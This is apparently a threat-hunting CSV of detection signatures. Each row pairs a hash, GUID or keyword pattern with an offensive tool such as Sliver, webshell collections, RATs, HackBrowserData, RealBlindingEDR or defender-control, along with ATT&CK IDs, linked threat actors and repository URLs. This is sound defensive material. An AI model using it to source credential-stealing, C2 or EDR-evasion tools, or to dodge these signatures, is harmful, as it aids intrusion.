"*b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8*",".{0,1000}b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34806"
"*b5d90d409125ed0f45be4d92aef25f2ed8faca96d076d28051645c72b5ad45c9*",".{0,1000}b5d90d409125ed0f45be4d92aef25f2ed8faca96d076d28051645c72b5ad45c9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","34807"
"*b5df5bd38cb4be2db37d159e001de5e5b6e9bbfc0f0e90a59827fd6290a1f05f*",".{0,1000}b5df5bd38cb4be2db37d159e001de5e5b6e9bbfc0f0e90a59827fd6290a1f05f.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34809"
"*b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455*",".{0,1000}b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34810"
"*B5E39D15-9678-474A-9838-4C720243968B*",".{0,1000}B5E39D15\-9678\-474A\-9838\-4C720243968B.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","#GUIDproject","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","34812"
"*b5e44b2b4b1775e2effc6920974850cfc576b93e30be6deb0c15a1a0bb144571*",".{0,1000}b5e44b2b4b1775e2effc6920974850cfc576b93e30be6deb0c15a1a0bb144571.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34813"
"*b5e8ccde03661cc33cc84e5cfd81badadb23a4d25a4117a92254c029c40d9c5a*",".{0,1000}b5e8ccde03661cc33cc84e5cfd81badadb23a4d25a4117a92254c029c40d9c5a.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","34814"
"*b5e916565fc5a539fd8e96436a17c57e38fbec58d8bc8a450596fd03c343a774*",".{0,1000}b5e916565fc5a539fd8e96436a17c57e38fbec58d8bc8a450596fd03c343a774.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34815"
"*b5f260bb692d6c09d126750032045c6ebe5be7345f2029c7c87391005c8a421c*",".{0,1000}b5f260bb692d6c09d126750032045c6ebe5be7345f2029c7c87391005c8a421c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34816"
"*b5f9ba7cbbe38220138a86b56db4acec50f670d3889505382429c489ec908214*",".{0,1000}b5f9ba7cbbe38220138a86b56db4acec50f670d3889505382429c489ec908214.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34818"
"*b5f9c922325f283dbf3ed921d4584b35493ceceb8b0e750cb250de96b0d5b7de*",".{0,1000}b5f9c922325f283dbf3ed921d4584b35493ceceb8b0e750cb250de96b0d5b7de.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34819"
"*b5fb07cbf59469e3e6716bde4e85056b27a27d99e3ada1d8b75bbbcfd4c1198e*",".{0,1000}b5fb07cbf59469e3e6716bde4e85056b27a27d99e3ada1d8b75bbbcfd4c1198e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34820"
"*b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489*",".{0,1000}b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34821"
"*b609c48dcb79bf60c039a05c4f048a001e00c1ce52c8b2e1b1d674234f9282cc*",".{0,1000}b609c48dcb79bf60c039a05c4f048a001e00c1ce52c8b2e1b1d674234f9282cc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34823"
"*b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e*",".{0,1000}b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34825"
"*b614be4e8653504d49488b1e14688f82bb6e96112c0780d24ce145f18751893e*",".{0,1000}b614be4e8653504d49488b1e14688f82bb6e96112c0780d24ce145f18751893e.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34826"
"*b626dc080fa41c23cf358fae12dfe70ed167a78b9173ae0249d4c02b7fadb34b*",".{0,1000}b626dc080fa41c23cf358fae12dfe70ed167a78b9173ae0249d4c02b7fadb34b.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","34830"
"*b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504*",".{0,1000}b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34831"
"*b627074538c668963eb93db599cd44510d9141a952ded1fbac4a606a2f2b4c13*",".{0,1000}b627074538c668963eb93db599cd44510d9141a952ded1fbac4a606a2f2b4c13.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34832"
"*b62764ff67244482f88ef117bf69d4ee51dc1691f6a62f3feab2dff8e94b9cdf*",".{0,1000}b62764ff67244482f88ef117bf69d4ee51dc1691f6a62f3feab2dff8e94b9cdf.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34833"
"*b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4*",".{0,1000}b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34834"
"*b62a8838e1abc2ec911eab920f3adc7a7e7d9f5e43daf520e868408e069aa9b8*",".{0,1000}b62a8838e1abc2ec911eab920f3adc7a7e7d9f5e43daf520e868408e069aa9b8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34835"
"*b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188*",".{0,1000}b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34837"
"*b63d587e4567a0f07910cf0314611a8f12f1cab4f119f40a0718782a76e413b3*",".{0,1000}b63d587e4567a0f07910cf0314611a8f12f1cab4f119f40a0718782a76e413b3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34838"
"*B64_ENCODED_PAYLOAD_UUID*",".{0,1000}B64_ENCODED_PAYLOAD_UUID.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34839"
"*b64c3a9b9927835384ce5106d7b3c9ade747243c5804159bfa5a64877c0a6c56*",".{0,1000}b64c3a9b9927835384ce5106d7b3c9ade747243c5804159bfa5a64877c0a6c56.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34841"
"*b64encode*.:::-989-:::.*",".{0,1000}b64encode.{0,1000}\.\:\:\:\-989\-\:\:\:\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#content","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34843"
"*b64payloadgen.sh*",".{0,1000}b64payloadgen\.sh.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","34844"
"*b64stager*",".{0,1000}b64stager.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","#content","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","34845"
"*B651A53C-FAE6-482E-A590-CA3B48B7F384*",".{0,1000}B651A53C\-FAE6\-482E\-A590\-CA3B48B7F384.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","34846"
"*b6575fb3abada109a6d35ce04e8ff89e07ba765659724536e9a04921bc0dc196*",".{0,1000}b6575fb3abada109a6d35ce04e8ff89e07ba765659724536e9a04921bc0dc196.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","34848"
"*b665b3db7a4ae240cf1e9526a11677bd25bd0f943bee7fd9a2df56f16a9a460f*",".{0,1000}b665b3db7a4ae240cf1e9526a11677bd25bd0f943bee7fd9a2df56f16a9a460f.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","34849"
"*b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8*",".{0,1000}b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","34851"
"*B67143DE-321D-4034-AC1D-C6BB2D98563F*",".{0,1000}B67143DE\-321D\-4034\-AC1D\-C6BB2D98563F.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","#GUIDproject","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","34852"
"*B672DE08-269D-4AA6-8535-D3BC59BB086B*",".{0,1000}B672DE08\-269D\-4AA6\-8535\-D3BC59BB086B.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","34853"
"*b67dfdf5659268bb48626ef39bf9c2c74c0b5d34d21c232a17e07ba200be11b5*",".{0,1000}b67dfdf5659268bb48626ef39bf9c2c74c0b5d34d21c232a17e07ba200be11b5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34855"
"*b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc*",".{0,1000}b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","34856"
"*b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc*",".{0,1000}b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","34857"
"*b68963ec0310b012dd393c583bd5f4062b63a749e3a457e4ce9e91db50ea726b*",".{0,1000}b68963ec0310b012dd393c583bd5f4062b63a749e3a457e4ce9e91db50ea726b.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34859"
"*b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c*",".{0,1000}b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34860"
"*b68e24dd90e163f0048746d1c49d16f82e62608ac441df90c5f18b0b79b8b879*",".{0,1000}b68e24dd90e163f0048746d1c49d16f82e62608ac441df90c5f18b0b79b8b879.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34861"
"*b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550*",".{0,1000}b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#filehash","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","34863"
"*b692e1272116e31f390f6b36c96a7912ed58f56958bab07db888049f5b65f111*",".{0,1000}b692e1272116e31f390f6b36c96a7912ed58f56958bab07db888049f5b65f111.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","34864"
"*b693b56c3ed54d8e250c8a7347f421df3bbe097bdd581696624257c5c656b8a3*",".{0,1000}b693b56c3ed54d8e250c8a7347f421df3bbe097bdd581696624257c5c656b8a3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34865"
"*b697318c942f44d36de647d4054759b7297ff90aba4de22d41488698b9d3e32c*",".{0,1000}b697318c942f44d36de647d4054759b7297ff90aba4de22d41488698b9d3e32c.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","34866"
"*b6a20cc4035c440aa539a0a8828d4372c9b160002ef9f0e44d9f9e89ed1dfcd0*",".{0,1000}b6a20cc4035c440aa539a0a8828d4372c9b160002ef9f0e44d9f9e89ed1dfcd0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","34868"
